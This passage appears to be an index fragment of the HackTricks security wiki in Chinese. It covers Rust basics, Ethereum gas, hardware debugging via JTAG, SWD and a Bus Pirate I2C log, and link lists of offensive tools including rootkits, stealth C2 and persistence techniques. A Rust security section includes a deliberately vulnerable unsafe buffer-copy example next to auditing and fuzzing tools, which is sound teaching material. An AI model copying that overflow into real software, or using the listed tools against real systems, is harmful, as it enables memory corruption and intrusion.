Counter-Mitigation","id":"10226","title":"Counter-Mitigation"},"10227":{"body":"永远不要将任何敏感数据放入URL中的GET参数或路径中。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Interesting Http » 防御","id":"10227","title":"防御"},"10228":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Rust Basics » Rust Basics","id":"10228","title":"Rust Basics"},"10229":{"body":"创建一个结构体,其中一个值可以是任何类型 rust struct Wrapper {\\nvalue: T,\\n} impl Wrapper {\\npub fn new(value: T) -> Self {\\nWrapper { value }\\n}\\n} Wrapper::new(42).value\\nWrapper::new(\\"Foo\\").value, \\"Foo\\"","breadcrumbs":"Rust Basics » 泛型","id":"10229","title":"泛型"},"1023":{"body":"燃料费衡量在以太坊上执行操作所需的计算工作量,以 gwei 计价。例如,一笔交易的费用为 2,310,000 gwei(或 0.00231 ETH),涉及燃料限制和基本费用,并向矿工提供小费以激励他们。用户可以设置最高费用,以确保他们不会支付过多,超出部分会被退还。","breadcrumbs":"Blockchain & Crypto » 理解燃料费","id":"1023","title":"理解燃料费"},"10230":{"body":"Option类型意味着值可能是Some类型(有某些东西)或None: rust pub enum Option {\\nNone,\\nSome(T),\\n} 您可以使用 is_some() 或 is_none() 等函数来检查 Option 的值。","breadcrumbs":"Rust Basics » Option, Some & None","id":"10230","title":"Option, Some & None"},"10231":{"body":"宏比函数更强大,因为它们扩展以生成比您手动编写的代码更多的代码。例如,函数签名必须声明函数的参数数量和类型。另一方面,宏可以接受可变数量的参数:我们可以用一个参数调用 println!(\\"hello\\"),或者用两个参数调用 println!(\\"hello {}\\", name)。此外,宏在编译器解释代码含义之前被扩展,因此宏可以在给定类型上实现一个特征。例如,函数不能这样做,因为它在运行时被调用,而特征需要在编译时实现。 rust macro_rules! my_macro {\\n() => {\\nprintln!(\\"Check out my macro!\\");\\n};\\n($val:expr) => {\\nprintln!(\\"Look at this other macro: {}\\", $val);\\n}\\n}\\nfn main() {\\nmy_macro!();\\nmy_macro!(7777);\\n} // Export a macro from a module\\nmod macros {\\n#[macro_export]\\nmacro_rules! 
my_macro {\\n() => {\\nprintln!(\\"Check out my macro!\\");\\n};\\n}\\n}","breadcrumbs":"Rust Basics » 宏","id":"10231","title":"宏"},"10232":{"body":"rust // Iterate through a vector\\nlet my_fav_fruits = vec![\\"banana\\", \\"raspberry\\"];\\nlet mut my_iterable_fav_fruits = my_fav_fruits.iter();\\nassert_eq!(my_iterable_fav_fruits.next(), Some(&\\"banana\\"));\\nassert_eq!(my_iterable_fav_fruits.next(), Some(&\\"raspberry\\"));\\nassert_eq!(my_iterable_fav_fruits.next(), None); // When it\'s over, it\'s none // One line iteration with action\\nmy_fav_fruits.iter().map(|x| capitalize_first(x)).collect() // Hashmap iteration\\nfor (key, hashvalue) in &*map {\\nfor key in map.keys() {\\nfor value in map.values() {","breadcrumbs":"Rust Basics » 迭代","id":"10232","title":"迭代"},"10233":{"body":"rust enum List {\\nCons(i32, List),\\nNil,\\n} let list = Cons(1, Cons(2, Cons(3, Nil)));","breadcrumbs":"Rust Basics » 递归盒子","id":"10233","title":"递归盒子"},"10234":{"body":"if rust let n = 5;\\nif n < 0 {\\nprint!(\\"{} is negative\\", n);\\n} else if n > 0 {\\nprint!(\\"{} is positive\\", n);\\n} else {\\nprint!(\\"{} is zero\\", n);\\n} 匹配 rust match number {\\n// Match a single value\\n1 => println!(\\"One!\\"),\\n// Match several values\\n2 | 3 | 5 | 7 | 11 => println!(\\"This is a prime\\"),\\n// TODO ^ Try adding 13 to the list of prime values\\n// Match an inclusive range\\n13..=19 => println!(\\"A teen\\"),\\n// Handle the rest of cases\\n_ => println!(\\"Ain\'t special\\"),\\n} let boolean = true;\\n// Match is an expression too\\nlet binary = match boolean {\\n// The arms of a match must cover all the possible values\\nfalse => 0,\\ntrue => 1,\\n// TODO ^ Try commenting out one of these arms\\n}; 循环(无限) rust loop {\\ncount += 1;\\nif count == 3 {\\nprintln!(\\"three\\");\\ncontinue;\\n}\\nprintln!(\\"{}\\", count);\\nif count == 5 {\\nprintln!(\\"OK, that\'s enough\\");\\nbreak;\\n}\\n} 当 rust let mut n = 1;\\nwhile n < 101 {\\nif n % 15 == 0 
{\\nprintln!(\\"fizzbuzz\\");\\n} else if n % 5 == 0 {\\nprintln!(\\"buzz\\");\\n} else {\\nprintln!(\\"{}\\", n);\\n}\\nn += 1;\\n} for rust for n in 1..101 {\\nif n % 15 == 0 {\\nprintln!(\\"fizzbuzz\\");\\n} else {\\nprintln!(\\"{}\\", n);\\n}\\n} // Use \\"..=\\" to make inclusive both ends\\nfor n in 1..=100 {\\nif n % 15 == 0 {\\nprintln!(\\"fizzbuzz\\");\\n} else if n % 3 == 0 {\\nprintln!(\\"fizz\\");\\n} else if n % 5 == 0 {\\nprintln!(\\"buzz\\");\\n} else {\\nprintln!(\\"{}\\", n);\\n}\\n} // ITERATIONS let names = vec![\\"Bob\\", \\"Frank\\", \\"Ferris\\"];\\n//iter - Doesn\'t consume the collection\\nfor name in names.iter() {\\nmatch name {\\n&\\"Ferris\\" => println!(\\"There is a rustacean among us!\\"),\\n_ => println!(\\"Hello {}\\", name),\\n}\\n}\\n//into_iter - COnsumes the collection\\nfor name in names.into_iter() {\\nmatch name {\\n\\"Ferris\\" => println!(\\"There is a rustacean among us!\\"),\\n_ => println!(\\"Hello {}\\", name),\\n}\\n}\\n//iter_mut - This mutably borrows each element of the collection\\nfor name in names.iter_mut() {\\n*name = match name {\\n&mut \\"Ferris\\" => \\"There is a rustacean among us!\\",\\n_ => \\"Hello\\",\\n}\\n} if let rust let optional_word = Some(String::from(\\"rustlings\\"));\\nif let word = optional_word {\\nprintln!(\\"The word is: {}\\", word);\\n} else {\\nprintln!(\\"The optional word doesn\'t contain anything\\");\\n} while let rust let mut optional = Some(0);\\n// This reads: \\"while `let` destructures `optional` into\\n// `Some(i)`, evaluate the block (`{}`). Else `break`.\\nwhile let Some(i) = optional {\\nif i > 9 {\\nprintln!(\\"Greater than 9, quit!\\");\\noptional = None;\\n} else {\\nprintln!(\\"`i` is `{:?}`. 
Try again.\\", i);\\noptional = Some(i + 1);\\n}\\n// ^ Less rightward drift and doesn\'t require\\n// explicitly handling the failing case.\\n}","breadcrumbs":"Rust Basics » 条件语句","id":"10234","title":"条件语句"},"10235":{"body":"为一个类型创建一个新方法 rust trait AppendBar {\\nfn append_bar(self) -> Self;\\n} impl AppendBar for String {\\nfn append_bar(self) -> Self{\\nformat!(\\"{}Bar\\", self)\\n}\\n} let s = String::from(\\"Foo\\");\\nlet s = s.append_bar();\\nprintln!(\\"s: {}\\", s);","breadcrumbs":"Rust Basics » 特性","id":"10235","title":"特性"},"10236":{"body":"rust #[cfg(test)]\\nmod tests {\\n#[test]\\nfn you_can_assert() {\\nassert!(true);\\nassert_eq!(true, true);\\nassert_ne!(true, false);\\n}\\n}","breadcrumbs":"Rust Basics » 测试","id":"10236","title":"测试"},"10237":{"body":"Arc Arc可以使用Clone来创建对对象的更多引用,以将它们传递给线程。当指向一个值的最后一个引用指针超出作用域时,该变量会被丢弃。 rust use std::sync::Arc;\\nlet apple = Arc::new(\\"the same apple\\");\\nfor _ in 0..10 {\\nlet apple = Arc::clone(&apple);\\nthread::spawn(move || {\\nprintln!(\\"{:?}\\", apple);\\n});\\n} Threads 在这种情况下,我们将传递一个变量给线程,它将能够修改该变量。 rust fn main() {\\nlet status = Arc::new(Mutex::new(JobStatus { jobs_completed: 0 }));\\nlet status_shared = Arc::clone(&status);\\nthread::spawn(move || {\\nfor _ in 0..10 {\\nthread::sleep(Duration::from_millis(250));\\nlet mut status = status_shared.lock().unwrap();\\nstatus.jobs_completed += 1;\\n}\\n});\\nwhile status.lock().unwrap().jobs_completed < 10 {\\nprintln!(\\"waiting... 
\\");\\nthread::sleep(Duration::from_millis(500));\\n}\\n}","breadcrumbs":"Rust Basics » 线程","id":"10237","title":"线程"},"10238":{"body":"Rust 默认提供强大的内存安全保证,但您仍然可以通过 unsafe 代码、依赖问题或逻辑错误引入关键漏洞。以下迷你备忘单汇集了您在对 Rust 软件进行攻防安全审查时最常接触的原语。 不安全代码与内存安全 unsafe 块选择退出编译器的别名和边界检查,因此 所有传统的内存损坏漏洞(越界、使用后释放、双重释放等)可能会再次出现 。快速审计检查清单: 查找 unsafe 块、extern \\"C\\" 函数、对 ptr::copy* 的调用、std::mem::transmute、MaybeUninit、原始指针或 ffi 模块。 验证传递给低级函数的每个指针算术和长度参数。 优先使用 #![forbid(unsafe_code)](整个 crate)或 #[deny(unsafe_op_in_unsafe_fn)](1.68 +),以在有人重新引入 unsafe 时使编译失败。 使用原始指针创建的溢出示例: rust use std::ptr; fn vuln_copy(src: &[u8]) -> Vec {\\nlet mut dst = Vec::with_capacity(4);\\nunsafe {\\n// ❌ copies *src.len()* bytes, the destination only reserves 4.\\nptr::copy_nonoverlapping(src.as_ptr(), dst.as_mut_ptr(), src.len());\\ndst.set_len(src.len());\\n}\\ndst\\n} 运行 Miri 是在测试时检测 UB 的一种廉价方法: bash rustup component add miri\\ncargo miri test # hunts for OOB / UAF during unit tests 使用 RustSec / cargo-audit 审计依赖项 大多数实际的 Rust 漏洞存在于第三方 crate 中。可以在本地查询 RustSec 顾问数据库(社区驱动): bash cargo install cargo-audit\\ncargo audit # flags vulnerable versions listed in Cargo.lock 将其集成到 CI 中,并在 --deny warnings 时失败。 cargo deny check advisories 提供类似的功能,以及许可证和禁用列表检查。 使用 cargo-vet 进行供应链验证 (2024) cargo vet 为您导入的每个 crate 记录一个审查哈希,并防止未注意的升级: bash cargo install cargo-vet\\ncargo vet init # generates vet.toml\\ncargo vet --locked # verifies packages referenced in Cargo.lock 该工具正在被Rust项目基础设施和越来越多的组织采用,以减轻被污染包攻击的风险。 Fuzzing your API surface (cargo-fuzz) 模糊测试可以轻松捕捉到可能导致DoS或旁路问题的恐慌、整数溢出和逻辑错误: bash cargo install cargo-fuzz\\ncargo fuzz init # creates fuzz_targets/\\ncargo fuzz run fuzz_target_1 # builds with libFuzzer & runs continuously 将模糊目标添加到您的仓库并在您的管道中运行它。","breadcrumbs":"Rust Basics » 安全基础","id":"10238","title":"安全基础"},"10239":{"body":"RustSec Advisory Database – https://rustsec.org Cargo-vet: \\"审计您的 Rust 依赖项\\" – https://mozilla.github.io/cargo-vet/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: 
HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Rust Basics » 参考","id":"10239","title":"参考"},"1024":{"body":"以太坊中的交易涉及发送者和接收者,可以是用户或智能合约地址。它们需要支付费用并且必须被挖掘。交易中的关键信息包括接收者、发送者的签名、价值、可选数据、燃料限制和费用。值得注意的是,发送者的地址是从签名中推导出来的,因此在交易数据中不需要它。 这些实践和机制是任何希望参与加密货币,同时优先考虑隐私和安全的人的基础。","breadcrumbs":"Blockchain & Crypto » 执行交易","id":"1024","title":"执行交易"},"10240":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 https://github.com/yarox24/attack_monitor https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/ https://github.com/ION28/BLUESPAWN https://github.com/PaperMtn/lil-pwny : 检查泄露的账户 https://github.com/rabobank-cdc/DeTTECT","breadcrumbs":"More Tools » BlueTeam","id":"10240","title":"BlueTeam"},"10241":{"body":"https://github.com/3vangel1st/kamerka https://github.com/BullsEye0/google_dork_list https://github.com/highmeh/lure https://www.shodan.io/ https://censys.io/ https://viz.greynoise.io/table https://www.zoomeye.org https://fofa.so https://www.onyphe.io https://app.binaryedge.io https://hunter.io https://wigle.net https://ghostproject.fr https://www.oshadan.com/ https://builtwith.com/ https://www.spiderfoot.net/ https://github.com/zricethezav/gitleaks https://www.nmmapper.com/sys/tools/subdomainfinder/ : 8个子域名查找工具,sublist3r,amass等","breadcrumbs":"More Tools » OSINT","id":"10241","title":"OSINT"},"10242":{"body":"https://github.com/AlisamTechnology/ATSCAN https://github.com/momenbasel/KeyFinder 
https://github.com/hahwul/XSpear https://github.com/BitTheByte/Monitorizer/ https://github.com/spinkham/skipfish https://github.com/blark/aiodnsbrute : 异步暴力破解域名 https://crt.sh/?q=%.yahoo.com : 子域名暴力破解 https://github.com/tomnomnom/httprobe : 检查域中的Web服务器是否可访问 https://github.com/aboul3la/Sublist3r : 子域名发现 https://github.com/gwen001/github-search/blob/master/github-subdomains.py : 在github中发现子域名 https://github.com/robertdavidgraham/masscan : 快速端口扫描 https://github.com/Threezh1/JSFinder : 从Web中的JS文件获取子域名和URL https://github.com/C1h2e1/MyFuzzingDict : Web文件字典 https://github.com/TypeError/Bookmarks/blob/master/README.md : Burp扩展以避免多个重复标签 https://github.com/hakluke/hakrawler : 获取资产 https://github.com/izo30/google-dorker : Google dorks https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md : Web BugBounty检查清单 https://github.com/Naategh/dom-red : 检查域列表以防止开放重定向 https://github.com/prodigysml/Dr.-Watson : Burp插件,离线分析以发现域、子域和IP https://github.com/hahwul/WebHackersWeapons : 不同工具的列表 https://github.com/gauravnarwani97/Trishul : BurpSuite插件以查找漏洞(SQLi,XSS,SSTI) https://github.com/fransr/postMessage-tracker : 用于跟踪post-messages函数的Chrome扩展 https://github.com/Quitten/Autorize : 自动身份验证测试(删除cookies并尝试发送请求) https://github.com/pikpikcu/xrcross : XRCross是一个重建、扫描器和渗透/ BugBounty测试工具。该工具旨在测试(XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI)漏洞","breadcrumbs":"More Tools » WEB","id":"10242","title":"WEB"},"10243":{"body":"https://github.com/Mr-Un1k0d3r/PoisonHandler : 横向移动 https://freddiebarrsmith.com/trix/trix.html : LOL bins https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79 ( https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ ): 持久性 https://github.com/odzhan/injection : Windows进程注入技术 https://github.com/BankSecurity/Red_Team : 红队脚本 https://github.com/l0ss/Grouper2 : 查找Active Directory组策略中的安全相关错误配置。 https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring : Securestring混淆 https://pentestlab.blog/2020/02/24/parent-pid-spoofing/ 
: 父PID欺骗 https://github.com/the-xentropy/xencrypt : 加密Powershell有效载荷 https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/ : 隐蔽C2 https://windows-internals.com/faxing-your-way-to-system/ : 关于Windows内部的日志系列 https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/ : 跟踪谁打开了文档 https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet : Active Directory备忘单","breadcrumbs":"More Tools » Windows","id":"10243","title":"Windows"},"10244":{"body":"工具q veo q pueden molar para analizar firmares (automaticas): https://github.com/craigz28/firmwalker https://github.com/fkie-cad/FACT_core https://gitlab.com/bytesweep/bytesweep-go Post-crema: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html Como extraer firmware si no lo encontramos online: https://www.youtube.com/watch?v=Kxvpbu9STU4 Aqui un firware con vulnerabilidades para analizar: https://github.com/scriptingxss/IoTGoat y por aqui la metodologia owasp para analizar firmware: https://github.com/scriptingxss/owasp-fstm Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a platform for automating the emulation and dynamic analysis of Linux-based firmware.","breadcrumbs":"More Tools » Firmware","id":"10244","title":"Firmware"},"10245":{"body":"https://twitter.com/HackAndDo/status/1202695084543791117 https://github.com/weev3/LKWA https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/ https://github.com/skelsec/jackdaw https://github.com/CoatiSoftware/Sourcetrail : 静态代码分析 https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html : Bluetooth LE CTF https://github.com/skeeto/endlessh : SSH tarpit that slowly sends an endless banner. 
AWS and Cloud tools: https://github.com/toniblyx/my-arsenal-of-aws-security-tools IFS (Interplanetary File System) for phising: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/ IP rotation services: https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212 Linux rootkit: https://github.com/aesophor/satanic-rootkit https://theia-ide.org/ : 在线IDE https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/ : 开始BugBounty的资源 https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab : IOS渗透测试工具 https://github.com/random-robbie/keywords/blob/master/keywords.txt : 关键词 https://github.com/ElevenPaths/HomePWN : 黑客IoT(Wifi,BLE,SSDP,MDNS) https://github.com/rackerlabs/scantron : 自动化扫描 https://github.com/doyensec/awesome-electronjs-hacking : 此列表旨在涵盖与Electron.js安全相关的主题。 https://github.com/serain/bbrecon : BB程序的信息 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"More Tools » OTHER","id":"10245","title":"OTHER"},"10246":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » 硬件黑客","id":"10246","title":"硬件黑客"},"10247":{"body":"JTAG 允许执行边界扫描。边界扫描分析某些电路,包括每个引脚的嵌入式边界扫描单元和寄存器。 JTAG 标准定义了 进行边界扫描的特定命令 ,包括以下内容: BYPASS 允许您测试特定芯片,而无需通过其他芯片。 SAMPLE/PRELOAD 在设备正常工作模式下,获取进入和离开设备的数据样本。 EXTEST 设置和读取引脚状态。 它还可以支持其他命令,例如: IDCODE 用于识别设备 INTEST 用于设备的内部测试 当您使用像 JTAGulator 这样的工具时,可能会遇到这些指令。","breadcrumbs":"Hardware Hacking » JTAG","id":"10247","title":"JTAG"},"10248":{"body":"边界扫描包括对四线 测试接入端口 (TAP) 的测试,这是一个通用端口,提供 对 JTAG 测试支持 功能的访问。TAP 使用以下五个信号: 测试时钟输入 ( TCK ) TCK 是定义 TAP 控制器执行单个操作频率的 时钟 (换句话说,跳转到状态机中的下一个状态)。 测试模式选择 ( TMS ) 输入 TMS 控制 有限状态机 。在每个时钟脉冲上,设备的 JTAG TAP 控制器检查 TMS 引脚上的电压。如果电压低于某个阈值,则信号被视为低并解释为 0;如果电压高于某个阈值,则信号被视为高并解释为 1。 测试数据输入 ( TDI ) TDI 是将 数据通过扫描单元发送到芯片 的引脚。每个供应商负责定义该引脚上的通信协议,因为 JTAG 并未定义此内容。 测试数据输出 ( TDO ) TDO 是将 数据从芯片发送出去 的引脚。 测试复位 ( TRST ) 输入 可选的 TRST 将有限状态机 重置为已知良好状态 。或者,如果 TMS 在五个连续的时钟周期内保持为 1,则会调用复位,方式与 TRST 引脚相同,这就是 TRST 是可选的原因。 有时您可以在 PCB 上找到这些引脚的标记。在其他情况下,您可能需要 找到它们 。","breadcrumbs":"Hardware Hacking » 测试接入端口","id":"10248","title":"测试接入端口"},"10249":{"body":"检测 JTAG 端口的最快但最昂贵的方法是使用 JTAGulator ,这是一种专门为此目的创建的设备(尽管它也 可以检测 UART 引脚 )。 它有 24 个通道 ,您可以连接到电路板引脚。然后,它执行 BF 攻击 ,发送所有可能组合的 IDCODE 和 BYPASS 边界扫描命令。如果收到响应,它会显示每个 JTAG 信号对应的通道。 一种更便宜但速度较慢的识别 JTAG 引脚的方法是使用 JTAGenum 加载在 Arduino 兼容的微控制器上。 使用 JTAGenum ,您首先需要 定义您将用于枚举的探测设备的引脚 。您需要参考设备的引脚图,然后将这些引脚与目标设备上的测试点连接。 识别 JTAG 引脚的 第三种方法 是通过 检查 PCB 中的引脚图。在某些情况下,PCB 可能方便地提供 Tag-Connect 接口 ,这清楚地表明该电路板也具有 JTAG 连接器。您可以在 https://www.tag-connect.com/info/ 查看该接口的外观。此外,检查 PCB 上芯片组的 数据表 可能会揭示指向 JTAG 接口的引脚图。","breadcrumbs":"Hardware Hacking » 识别 JTAG 引脚","id":"10249","title":"识别 JTAG 引脚"},"1025":{"body":"https://en.wikipedia.org/wiki/Proof_of_stake https://www.mycryptopedia.com/public-key-private-key-explained/ https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions https://ethereum.org/en/developers/docs/transactions/ https://ethereum.org/en/developers/docs/gas/ 
https://en.bitcoin.it/wiki/Privacy tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Blockchain & Crypto » 参考文献","id":"1025","title":"参考文献"},"10250":{"body":"SWD 是一种专为调试设计的 ARM 特定协议。 SWD 接口需要 两个引脚 :一个双向的 SWDIO 信号,相当于 JTAG 的 TDI 和 TDO 引脚 以及一个时钟,和 SWCLK ,相当于 JTAG 中的 TCK 。许多设备支持 串行线或 JTAG 调试端口 (SWJ-DP) ,这是一个结合了 JTAG 和 SWD 接口的接口,使您能够将 SWD 或 JTAG 探头连接到目标。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » SDW","id":"10250","title":"SDW"},"10251":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 故障注入攻击包括在电子电路中引入外部干扰以影响其行为,从而导致信息泄露或甚至绕过电路中的某些限制。这种攻击为攻击电子电路打开了许多可能性。这种攻击也被称为电子电路的故障。 有很多方法和媒介可以将故障注入到电子电路中。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » Fault Injection Attacks » Fault Injection Attacks","id":"10251","title":"Fault Injection Attacks"},"10252":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » I2C » I2C","id":"10252","title":"I2C"},"10253":{"body":"要测试 Bus Pirate 是否正常工作,将 +5V 连接到 VPU,将 3.3V 连接到 ADC,然后访问 Bus Pirate(例如使用 Tera Term),并使用命令 ~: bash # Use command\\nHiZ>~\\nDisconnect any devices\\nConnect (Vpu to +5V) and (ADC to +3.3V)\\nSpace to continue\\n# Press space\\nCtrl\\nAUX OK\\nMODE LED OK\\nPULLUP H OK\\nPULLUP L OK\\nVREG OK\\nADC and supply\\n5V(4.96) OK\\nVPU(4.96) OK\\n3.3V(3.26) OK\\nADC(3.27) OK\\nBus high\\nMOSI OK\\nCLK OK\\nMISO OK\\nCS OK\\nBus Hi-Z 0\\nMOSI OK\\nCLK OK\\nMISO OK\\nCS OK\\nBus Hi-Z 1\\nMOSI OK\\nCLK OK\\nMISO OK\\nCS OK\\nMODE and VREG LEDs should be on!\\nAny key to exit\\n#Press space\\nFound 0 errors. 
如您在前面的命令行中看到的,它显示找到 0 个错误。这在购买后或刷新固件后确认其正常工作非常有用。 要连接到 bus pirate,您可以参考文档: 在这种情况下,我将连接到一个 EPROM:ATMEL901 24C256 PU27: 与 bus pirate 通信时,我使用 Tera Term 连接到 pirate bus COM 端口,设置为 Setup --> Serial Port --> Speed 为 115200。 在以下通信中,您可以找到如何准备 bus pirate 以进行 I2C 通信,以及如何从内存中写入和读取(注释部分使用 \\"#\\",请不要期待在通信中看到该部分): bash # Check communication with buspirate\\ni\\nBus Pirate v3.5\\nCommunity Firmware v7.1 - goo.gl/gCzQnW [HiZ 1-WIRE UART I2C SPI 2WIRE 3WIRE KEYB LCD PIC DIO] Bootloader v4.5\\nDEVID:0x0447 REVID:0x3046 (24FJ64GA00 2 B8)\\nhttp://dangerousprototypes.com # Check voltages\\nI2C>v\\nPinstates:\\n1.(BR) 2.(RD) 3.(OR) 4.(YW) 5.(GN) 6.(BL) 7.(PU) 8.(GR) 9.(WT) 0.(Blk)\\nGND 3.3V 5.0V ADC VPU AUX SCL SDA - -\\nP P P I I I I I I I\\nGND 3.27V 4.96V 0.00V 4.96V L H H L L #Notice how the VPU is in 5V becausethe EPROM needs 5V signals # Get mode options\\nHiZ>m\\n1. HiZ\\n2. 1-WIRE\\n3. UART\\n4. I2C\\n5. SPI\\n6. 2WIRE\\n7. 3WIRE\\n8. KEYB\\n9. LCD\\n10. PIC\\n11. DIO\\nx. exit(without change) # Select I2C\\n(1)>4\\nI2C mode:\\n1. Software\\n2. Hardware # Select Software mode\\n(1)>1\\nSet speed:\\n1. ~5kHz\\n2. ~50kHz\\n3. ~100kHz\\n4. ~240kHz # Select communication spped\\n(1)> 2\\nClutch disengaged!!!\\nTo finish setup, start up the power supplies with command \'W\'\\nReady # Start communication\\nI2C>W\\nPOWER SUPPLIES ON\\nClutch engaged!!! # Get macros\\nI2C>(0)\\n0.Macro menu\\n1.7bit address search\\n2.I2C sniffer #Get addresses of slaves connected\\nI2C>(1)\\nSearching I2C address space. 
